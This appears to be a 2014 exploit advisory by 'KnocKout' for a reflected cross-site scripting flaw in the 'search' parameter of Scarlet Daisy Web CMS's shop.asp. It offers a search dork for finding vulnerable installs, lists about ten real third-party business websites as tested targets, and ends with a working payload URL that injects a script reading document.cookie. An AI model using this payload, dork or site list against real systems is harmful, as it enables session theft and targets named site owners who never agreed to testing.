Scarlet Daisy Web CMS <= Reflected XSS Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz: DaiMon, PRoMaX, _UnDeRTaKeR_ , BackDoor
Septemb0x , BARCOD3 , ZoRLu, ( milw00rm.com )
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~App. : Scarlet Daisy Web Web Content Management System.
|~Software: http://www.scarletdaisy.com
|~Vulnerability Style : Cross Site Scripting
|[~]Date : "09.12.2014"
|[~]Tested on : Kali Linux
|[Keywords/DORK]: "Powered by Scarlet Daisy Web Content Management System."
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Tested on
http://www.scarletdaisy.com
http://www.crossstitchworkshop.co.uk
http://www.camelotcandlesupplies.co.uk
http://www.claymorehomes.co.uk
http://www.papiransky.co.uk
http://www.sfp-ifa.co.uk
http://www.hattongarage.co.uk
http://www.j-a-c-k.org
http://ahnaylortextiles.co.uk
http://www.ladymire.co.uk
..
..
==============[INFO]======================================
shop.asp 'search' parameter is not safe.
harmful character, they should be filtered.
==============[Exploitation]==============================
HTTP://[VICTIM]/shop.asp?action=form&search=
POST: [Cross Site Scripting]
HTTP://[VICTIM]/shop.asp?search=
POST: [Cross Site Scripting]
HTTP://[VICTIM]/shop.asp?action=form&search=<b>HI WORLD</b>"><script>alert(document.cookie)</script>